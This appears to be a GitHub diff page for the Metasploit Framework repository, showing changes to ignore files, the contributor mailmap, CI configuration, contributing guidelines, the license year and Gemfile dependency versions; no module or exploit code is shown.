Remove scrollout_loadlogs_exec for @bcoles

Move #6900 into unstable
Fix unstable branch
2017-04-21 21:24:06 -05:00 · 2016-07-20 15:17:32 -05:00 · 2016-07-20 15:12:45 -05:00 · 2016-07-20 13:10:17 -05:00 · 2016-05-25 19:32:55 -05:00 · 2016-05-25 04:07:09 -05:00
2023 changed files with 78055 additions and 72449 deletions
@@ -1,95 +0,0 @@
-.dockerignore
-.gitignore
-.env*
-docker-compose*.yml
-docker/
-!docker/msfconsole.rc
-README.md
-
-.bundle
-Gemfile.local
-Gemfile.local.lock
-# Rubymine project directory
-.idea
-# Sublime Text project directory (not created by ST by default)
-.sublime-project
-# RVM control file, keep this to avoid backdooring Metasploit
-.rvmrc
-# Allow for a local choice of (unsupported / semi-supported) ruby versions
-# See PR #4136 for usage, but example usage for rvm:
-#   rvm --create --versions-conf use 2.1.4@metasploit-framework
-# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
-#   rbenv shell 2.1.4
-.versions.conf
-# YARD cache directory
-.yardoc
-# Mac OS X files
-.DS_Store
-# database config for testing
-config/database.yml
-# target config file for testing
-features/support/targets.yml
-# simplecov coverage data
-coverage
-doc/
-external/source/meterpreter/java/bin
-external/source/meterpreter/java/build
-external/source/meterpreter/java/extensions
-external/source/javapayload/bin
-external/source/javapayload/build
-# Java binary ignores. Replace the 5 above with this once we're merged.
-external/source/javapayload/*/.classpath
-external/source/javapayload/*/.project
-external/source/javapayload/*/.settings
-external/source/javapayload/*/bin
-external/source/javapayload/*/target
-external/source/javapayload/*/*/.classpath
-external/source/javapayload/*/*/.project
-external/source/javapayload/*/*/.settings
-external/source/javapayload/*/*/bin
-external/source/javapayload/*/*/target
-# Packaging directory
-pkg
-tags
-*.swp
-*.orig
-*.rej
-*~
-# Ignore backups of retabbed files
-*.notab
-
-# ignore Visual Studio external source garbage
-*.suo
-*.sdf
-*.opensdf
-*.user
-
-# Rails log directory
-/log
-# Rails tmp directory
-/tmp
-
-# ignore release/debug folders for exploits
-external/source/exploits/**/Debug
-external/source/exploits/**/Release
-
-# Avoid checking in Meterpreter binaries. These are supplied upstream by
-# the metasploit-payloads gem.
-data/meterpreter/*.dll
-data/meterpreter/*.php
-data/meterpreter/*.py
-data/meterpreter/*.bin
-data/meterpreter/*.jar
-data/meterpreter/*.lso
-data/android
-data/java
-
-# Avoid checking in Meterpreter libs that are built from
-# private source. If you're interested in this functionality,
-# check out Metasploit Pro: http://metasploit.com/download
-data/meterpreter/ext_server_pivot.*.dll
-
-# Avoid checking in metakitty, the source for
-# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
-/metakitty
-.vagrant
@@ -85,6 +85,3 @@ data/meterpreter/ext_server_pivot.*.dll
 # https://rapid7.github.io/metasploit-framework. It's an orphan branch.
 /metakitty
 .vagrant
-
-# local docker compose overrides
-docker-compose.local*
@@ -1,56 +1,58 @@
-acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
-bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
+acammack-r7 <acammack-r7@github>     Adam Cammack <Adam_Cammack@rapid7.com>
 bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
-bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
-bpatterson-r7 <bpatterson-r7@github> <Brian_Patterson@rapid7.com>
-bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
-bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
-dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
-dmaloney-r7 <dmaloney-r7@github>     <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>     <DMaloney@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     <Dev_Mohanty@rapid7.com>
-ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
-egypt <egypt@github>                 <egypt@metasploit.com> # aka egypt
-egypt <egypt@github>                 <james_lee@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
-jhart-r7 <jhart-r7@github>           <jon_hart@rapid7.com>
-jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>       <jqian@rapid7.com>
-jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
-kgray-r7 <kgray-r7@github>           <kyle_gray@rapid7.com>
-khayes-r7 <khayes-r7@github>         <Kirk_Hayes@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance@aus-mac-1041.aus.rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance@AUS-MAC-1041.local>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez+github@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
-lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
-pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <scott_davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <Scott_Davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <sdavis@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
-tatanus <tatanus@github>             <adam_compton@rapid7.com>
-tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
-todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>             <todb@metasploit.com>
-todb-r7 <todb-r7@github>             <todb@packetfu.com>
+bcook-r7 <bcook-r7@github>           Brent Cook <bcook@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github> Brian Patterson <Brian_Patterson@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github> bpatterson-r7 <Brian_Patterson@rapid7.com>
+bturner-r7 <bturner-r7@github>       Brandon Turner <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>     Brendan <bwatters@rapid7.com>
+bwatters-r7 <bwatters-r7@github>     Brendan Watters <bwatters@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>     Chris Doughty <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>     Deral Heiland <dh@layereddefense.com>
+dmaloney-r7 <dmaloney-r7@github>     David Maloney <DMaloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>     David Maloney <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>     dmaloney-r7 <DMaloney@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
+ecarey-r7 <ecarey-r7@github>         Erran Carey <e@ipwnstuff.com>
+farias-r7 <farias-r7@github>         Fernando Arias <fernando_arias@rapid7.com>
+gmikeska-r7 <gmikeska-r7@github>     Greg Mikeska <greg_mikeska@rapid7.com>
+gmikeska-r7 <gmikeska-r7@github>     Gregory Mikeska <greg_mikeska@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>     James Barnett <James_Barnett@rapid7.com>
+jhart-r7 <jhart-r7@github>           Jon Hart <jon_hart@rapid7.com>
+jlee-r7 <jlee-r7@github>             <egypt@metasploit.com> # aka egypt
+jlee-r7 <jlee-r7@github>             <james_lee@rapid7.com>
+kgray-r7 <kgray-r7@github>           Kyle Gray <kyle_gray@rapid7.com>
+khayes-r7 <khayes-r7@github>         l0gan <Kirk_Hayes@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez+github@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@AUS-MAC-1041.local>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@aus-mac-1041.aus.rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     darkbushido <lance.sanchez@gmail.com>
+lsato-r7 <lsato-r7@github>           Louis Sato <lsato@rapid7.com>
+pbarry-r7 <pbarry-r7@github>         Pearce Barry <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> Paul Deardorff <Paul_Deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> pdeardorff-r7 <paul_deardorff@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         Scott Davis <Scott_Davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         Scott Lee Davis <scott_davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         Scott Lee Davis <sdavis@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   Sonny Gonzalez <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   Sonny Gonzalez <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>     Samuel Huckins <samuel_huckins@rapid7.com>
+tdoan-r7 <tdoan-r7@github>           tdoan-r7 <thao_doan@rapid7.com>
+tdoan-r7 <tdoan-r7@github>           thao doan <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>             Tod Beardsley <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>             Tod Beardsley <todb@metasploit.com>
+todb-r7 <todb-r7@github>             Tod Beardsley <todb@packetfu.com>
 wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
-wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
-wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
-wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>
+wvu-r7 <wvu-r7@github>               William Vu <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>               William Vu <wvu@cs.nmt.edu>
+wvu-r7 <wvu-r7@github>               William Vu <wvu@metasploit.com>
+wvu-r7 <wvu-r7@github>               wvu-r7 <William_Vu@rapid7.com>
+wwebb-r7 <wwebb-r7@github>           William Webb <William_Webb@rapid7.com>
+wwebb-r7 <wwebb-r7@github>           wwebb-r7 <William_Webb@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -64,14 +66,15 @@ bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
 bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
-brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
+brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
-bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
 bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
+bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
+Chao-mu <Chao-Mu@github>               Chao Mu <chao.mu@minorcrash.com>
+Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
 Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
-Chao-mu <Chao-Mu@github>               <chao.mu@minorcrash.com>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
 claudijd <claudijd@github>             Jonathan Claudius <claudijd@yahoo.com>
@@ -82,24 +85,22 @@ crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
-espreto <espreto@github>               <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
-farias-r7 <farias-r7@github>           <fernando_arias@rapid7.com>
-FireFart <FireFart@github>             <firefart@gmail.com>
 FireFart <FireFart@github>             <FireFart@users.noreply.github.com>
-gmikeska-r7 <gmikeska-r7@github>       <greg_mikeska@rapid7.com>
-gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <=>
-gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <YOUR_USERNAME_FOR_EMAIL>
+FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
 g0tmi1k <g0tmi1k@github>               <g0tmi1k@users.noreply.github.com>
 g0tmi1k <g0tmi1k@github>               <have.you.g0tmi1k@gmail.com>
-h00die <h00die@github>                 <h00die@users.noreply.github.com>
-h00die <h00die@github>                 <mike@shorebreaksecurity.com>
 h0ng10 <h0ng10@github>                 h0ng10 <hansmartin.muench@googlemail.com>
 h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
-hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
 hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
+hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
 hdm <hdm@github>                       HD Moore <x@hdm.io>
-jabra <jabra@github>                   <jabra@spl0it.org>
+jabra <jabra@github>                   Josh Abraham <jabra@spl0it.org>
+jabra <jabra@github>                   Joshua Abraham <jabra@spl0it.org>
 jcran <jcran@github>                   <jcran@0x0e.org>
 jcran <jcran@github>                   <jcran@pentestify.com>
 jcran <jcran@github>                   <jcran@pwnieexpress.com>
@@ -107,9 +108,9 @@ jcran <jcran@github>                   <jcran@rapid7.com>
 jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
-joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
+joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           jvennix-r7 <Joe_Vennix@rapid7.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan.vazquez@metasploit.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan_vazquez@rapid7.com>
@@ -138,20 +139,15 @@ r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
 rep <mschloesser-r7@github>            Mark Schloesser <mark_schloesser@rapid7.com>
 rep <mschloesser-r7@github>            mschloesser-r7 <mark_schloesser@rapid7.com>
-RageLtMan <sempervictus@github>        <rageltman [at] sempervictus>
-RageLtMan <sempervictus@github>        <rageltman@sempervictus.com>
 Rick Flores <0xnanoquetz9l@gmail.com>  Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
 rsmudge <rsmudge@github>               Raphael Mudge <rsmudge@gmail.com> # Aka `butane
-rwhitcroft <rwhitcroft@github>         <rwhitcroft.github@gmail.com>
-rwhitcroft <rwhitcroft@github>         <rwhitcroft@gmail.com>
-rwhitcroft <rwhitcroft@github>         <rwhitcroft@users.noreply.github.com>
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
 scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
-stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
 stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
+stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
@@ -161,10 +157,10 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
-void-in <void-in@github>               void_in <root@localhost.localdomain>
+void-in <void-in@github>               root <void-in@users.noreply.github.com>
 void-in <void-in@github>               void-in <root@localhost.localdomain>
-void-in <void-in@github>               <void-in@users.noreply.github.com>
 void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
+void-in <void-in@github>               void_in <root@localhost.localdomain>
 void-in <void-in@github>               Waqas Ali <waqas.bsquare@gmail.com>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>

@@ -1 +1 @@
-2.3.3
+2.3.1
@@ -1,17 +1,16 @@
-dist: trusty
 sudo: false
 group: stable
 bundler_args: --without coverage development pcap
 cache: bundler
 addons:
-  postgresql: '9.6'
+  postgresql: '9.3'
  apt:
    packages:
      - libpcap-dev
      - graphviz
 language: ruby
 rvm:
-  - '2.3.3'
+  - '2.3.1'

 env:
  - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
@@ -46,7 +46,6 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description
-* **Do** write [release notes] once a pull request is landed
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.

@@ -109,7 +108,6 @@ already way ahead of the curve, so keep it up!
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
 [PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
 [PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2017, Rapid7, Inc.
+Copyright (C) 2006-2016, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -20,11 +20,7 @@ group :development do
  gem 'pry'
  # module documentation
  gem 'octokit', '~> 4.0'
-  # session aggregator, native builds have issues on arm platforms for now
-  gem 'metasploit-aggregator' if [
-    'x86-mingw32', 'x64-mingw32',
-    'x86_64-linux', 'x86-linux',
-    'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
+  # rails-upgrade staging gems
 end

 group :development, :test do
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.14.7)
+    metasploit-framework (4.12.15)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -14,88 +14,71 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.2.19)
+      metasploit-payloads (= 1.1.13)
      metasploit_data_models
-      metasploit_payloads-mettle (= 0.1.8)
+      metasploit_payloads-mettle
      msgpack
-      nessus_rest
      net-ssh
      network_interface
-      nexpose
      nokogiri
      octokit
      openssl-ccm
-      openvas-omp
-      packetfu (= 1.1.13.pre)
+      packetfu
      patch_finder
      pcaprub
      pg
      railties
-      rb-readline
+      rb-readline-r7
      recog
      redcarpet
-      rex-arch (= 0.1.4)
-      rex-bin_tools
-      rex-core
-      rex-encoder
-      rex-exploitation
      rex-java
-      rex-mime
-      rex-nop
-      rex-ole
      rex-powershell
      rex-random_identifier
      rex-registry
-      rex-rop_builder
-      rex-socket
-      rex-sslscan
      rex-struct2
      rex-text
      rex-zip
      robots
-      ruby_smb
-      rubyntlm
      rubyzip
      sqlite3
      sshkey
      tzinfo
      tzinfo-data
-      windows_error

 GEM
  remote: https://rubygems.org/
  specs:
-    actionpack (4.2.8)
-      actionview (= 4.2.8)
-      activesupport (= 4.2.8)
+    actionpack (4.2.7)
+      actionview (= 4.2.7)
+      activesupport (= 4.2.7)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.8)
-      activesupport (= 4.2.8)
+    actionview (4.2.7)
+      activesupport (= 4.2.7)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
-      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.8)
-      activesupport (= 4.2.8)
+      rails-html-sanitizer (~> 1.0, >= 1.0.2)
+    activemodel (4.2.7)
+      activesupport (= 4.2.7)
      builder (~> 3.1)
-    activerecord (4.2.8)
-      activemodel (= 4.2.8)
-      activesupport (= 4.2.8)
+    activerecord (4.2.7)
+      activemodel (= 4.2.7)
+      activesupport (= 4.2.7)
      arel (~> 6.0)
-    activesupport (4.2.8)
+    activesupport (4.2.7)
      i18n (~> 0.7)
+      json (~> 1.7, >= 1.7.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.5.1)
-      public_suffix (~> 2.0, >= 2.0.2)
-    arel (6.0.4)
+    addressable (2.4.0)
+    arel (6.0.3)
    arel-helpers (2.3.0)
      activerecord (>= 3.1.0, < 6)
-    aruba (0.14.2)
+    aruba (0.14.1)
      childprocess (~> 0.5.6)
      contracts (~> 0.9)
      cucumber (>= 1.3.19)
@@ -103,10 +86,9 @@ GEM
      rspec-expectations (>= 2.99)
      thor (~> 0.19)
    bcrypt (3.1.11)
-    bindata (2.3.5)
    bit-struct (0.15.0)
-    builder (3.2.3)
-    capybara (2.13.0)
+    builder (3.2.2)
+    capybara (2.7.1)
      addressable
      mime-types (>= 1.16)
      nokogiri (>= 1.3.3)
@@ -116,7 +98,7 @@ GEM
    childprocess (0.5.9)
      ffi (~> 1.0, >= 1.0.11)
    coderay (1.1.1)
-    contracts (0.15.0)
+    contracts (0.14.0)
    cucumber (2.4.0)
      builder (>= 2.1.2)
      cucumber-core (~> 1.5.0)
@@ -127,60 +109,39 @@ GEM
      multi_test (>= 0.1.2)
    cucumber-core (1.5.0)
      gherkin (~> 4.0)
-    cucumber-rails (1.4.5)
+    cucumber-rails (1.4.3)
      capybara (>= 1.1.2, < 3)
-      cucumber (>= 1.3.8, < 4)
+      cucumber (>= 1.3.8, < 3)
      mime-types (>= 1.16, < 4)
      nokogiri (~> 1.5)
-      railties (>= 3, < 5.1)
+      railties (>= 3, < 5)
    cucumber-wire (0.0.1)
-    diff-lcs (1.3)
+    diff-lcs (1.2.5)
    docile (1.1.5)
    erubis (2.7.0)
-    factory_girl (4.8.0)
+    factory_girl (4.7.0)
      activesupport (>= 3.0.0)
-    factory_girl_rails (4.8.0)
-      factory_girl (~> 4.8.0)
+    factory_girl_rails (4.7.0)
+      factory_girl (~> 4.7.0)
      railties (>= 3.0.0)
-    faraday (0.11.0)
+    faraday (0.9.2)
      multipart-post (>= 1.2, < 3)
-    ffi (1.9.18)
+    ffi (1.9.14)
    filesize (0.1.1)
-    fivemat (1.3.3)
-    gherkin (4.1.1)
-    google-protobuf (3.2.0.2)
-    googleauth (0.5.1)
-      faraday (~> 0.9)
-      jwt (~> 1.4)
-      logging (~> 2.0)
-      memoist (~> 0.12)
-      multi_json (~> 1.11)
-      os (~> 0.9)
-      signet (~> 0.7)
-    grpc (1.2.0)
-      google-protobuf (~> 3.1)
-      googleauth (~> 0.5.1)
-    i18n (0.8.1)
-    jsobfu (0.4.2)
-      rkelly-remix
-    json (2.0.3)
-    jwt (1.5.6)
-    little-plugger (1.1.4)
-    logging (2.2.0)
-      little-plugger (~> 1.1)
-      multi_json (~> 1.10)
+    fivemat (1.3.2)
+    gherkin (4.0.0)
+    i18n (0.7.0)
+    jsobfu (0.4.1)
+      rkelly-remix (= 0.0.6)
+    json (1.8.3)
    loofah (2.0.3)
      nokogiri (>= 1.5.9)
-    memoist (0.15.0)
-    metasm (1.0.3)
-    metasploit-aggregator (0.1.3)
-      grpc
-      rex-arch
-    metasploit-concern (2.0.3)
+    metasm (1.0.2)
+    metasploit-concern (2.0.1)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (2.0.8)
+    metasploit-credential (2.0.3)
      metasploit-concern
      metasploit-model
      metasploit_data_models
@@ -188,12 +149,12 @@ GEM
      railties
      rubyntlm
      rubyzip
-    metasploit-model (2.0.3)
+    metasploit-model (2.0.0)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.2.19)
-    metasploit_data_models (2.0.14)
+    metasploit-payloads (1.1.13)
+    metasploit_data_models (2.0.0)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
@@ -203,34 +164,33 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.1.8)
+    metasploit_payloads-mettle (0.0.5)
    method_source (0.8.2)
    mime-types (3.1)
      mime-types-data (~> 3.2015)
    mime-types-data (3.2016.0521)
    mini_portile2 (2.1.0)
-    minitest (5.10.1)
-    msgpack (1.1.0)
+    minitest (5.9.0)
+    msgpack (1.0.0)
    multi_json (1.12.1)
    multi_test (0.1.2)
    multipart-post (2.0.0)
-    nessus_rest (0.1.6)
-    net-ssh (4.1.0)
+    net-ssh (3.2.0)
    network_interface (0.0.1)
-    nexpose (5.3.2)
-    nokogiri (1.7.1)
+    nokogiri (1.6.8)
      mini_portile2 (~> 2.1.0)
-    octokit (4.6.2)
-      sawyer (~> 0.8.0, >= 0.5.3)
+      pkg-config (~> 1.1.7)
+    octokit (4.3.0)
+      sawyer (~> 0.7.0, >= 0.5.3)
    openssl-ccm (1.2.1)
-    openvas-omp (0.0.4)
-    os (0.9.6)
-    packetfu (1.1.13.pre)
-      pcaprub
+    packetfu (1.1.11)
+      network_interface (~> 0.0)
+      pcaprub (~> 0.12)
    patch_finder (1.0.2)
    pcaprub (0.12.4)
-    pg (0.20.0)
+    pg (0.18.4)
    pg_array_parser (0.0.9)
+    pkg-config (1.1.7)
    postgres_ext (3.0.0)
      activerecord (>= 4.0.0)
      arel (>= 4.0.1)
@@ -239,76 +199,41 @@ GEM
      coderay (~> 1.1.0)
      method_source (~> 0.8.1)
      slop (~> 3.4)
-    public_suffix (2.0.5)
-    rack (1.6.5)
+    rack (1.6.4)
    rack-test (0.6.3)
      rack (>= 1.0)
    rails-deprecated_sanitizer (1.0.3)
      activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.8)
+    rails-dom-testing (1.0.7)
      activesupport (>= 4.2.0.beta, < 5.0)
-      nokogiri (~> 1.6)
+      nokogiri (~> 1.6.0)
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.3)
      loofah (~> 2.0)
-    railties (4.2.8)
-      actionpack (= 4.2.8)
-      activesupport (= 4.2.8)
+    railties (4.2.7)
+      actionpack (= 4.2.7)
+      activesupport (= 4.2.7)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (12.0.0)
-    rb-readline (0.5.4)
-    recog (2.1.5)
+    rake (11.2.2)
+    rb-readline-r7 (0.5.2.0)
+    recog (2.0.21)
      nokogiri
-    redcarpet (3.4.0)
-    rex-arch (0.1.4)
-      rex-text
-    rex-bin_tools (0.1.1)
-      metasm
-      rex-arch
-      rex-core
-      rex-struct2
-      rex-text
-    rex-core (0.1.8)
-    rex-encoder (0.1.2)
-      metasm
-      rex-arch
-      rex-text
-    rex-exploitation (0.1.11)
-      jsobfu
-      metasm
-      rex-arch
-      rex-encoder
-      rex-text
-    rex-java (0.1.3)
